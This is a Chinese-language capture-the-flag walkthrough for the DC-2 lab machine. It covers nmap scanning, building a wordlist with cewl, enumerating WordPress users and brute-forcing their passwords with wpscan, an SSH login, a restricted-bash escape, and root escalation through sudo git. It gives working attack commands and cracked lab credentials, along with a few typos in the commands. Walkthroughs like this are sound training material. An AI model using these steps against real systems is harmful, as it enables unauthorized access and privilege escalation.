一、准备工作

靶机下载地址链接: 百度网盘 请输入提取码 提取码: ib86

二、信息收集

1.nmap的信息收集

（1）使用nmap 192.168.101.0/24，发现靶机地址为192.168.101.115

（2）对靶机做进一步探测，发现靶机开启了80和7744（SSH）端口: nmap -A -p- 192.168.101.115

（3）先从80端口寻找突破口，访问一下http://192.168.101.115 ,发现URL栏写的不是靶机的ip，而是http://dc-2/，而很明显，DNS没有解析出来

（4）回过头来注意到nmap扫描时有这样一个提示，基本可以确认需要手动配置hosts文件

（5）配置hosts文件

1.sudo vim /etc/hosts 2.在文件添加：192.168.101.115（靶机ip） dc-2

再次访问http://192.168.101.115,得到一些提示：

2.网站的信息收集

cewl是一个kali自带的密码生成工具

（6）使用cewl生成密码

命令：cewl -w dc2_passwords.txt http://dc-2

（7）确定是wordpress，使用wpscan工具进行扫描用户

命令1：wpscan --url http://dc-2 --enumerate u #暴力枚举用户名

或命令2：wpscan --ignore-main-redirect --url 192.168.:101.115 --enumerate u --force

扫描出三个用户：admin、tom和jerry。将三个用户写入dc2_user.txt中。

（8）利用得到用户密码的字典进行爆破

使用wpscan进行密码爆破，命令：wpscan --ignore-main-redirect --url 192.168.101.115 -U dc2_user.txt -P dc2_passwords.txt --force

Username: jerry, Password: adipiscing；Username: tom , Password: parturient

（9）尝试ssh远程登录，最终tom成功登录

命令：tom@192.168.101.115 -p 7744

三、渗透

（10）rbash绕过

1.输入whoami，发现事受限的shell命令，为rbash

2.绕过shell：先输入 BASH_CMDS[a]=/bin/sh;a ，再输入 /bin/bash

（11）使用并添加环境变量

PATH就是定义/bin:/sbin:/usr/bin等这些路径的变量，其中冒号为目录间的分割符。

可以查看flag3.txt的内容：

命令： export PATH=$PATH:/bin/

（12）切换Jerry用户：su jerry

flag4：

四、提权

（13）先查看一下自己能不能免密使用一些root级别的命令，恰好发现了git

（14）git提权

1.使用 sudo git help config；2.在最底下面输入 !/bin/bash；3.最后完成提权。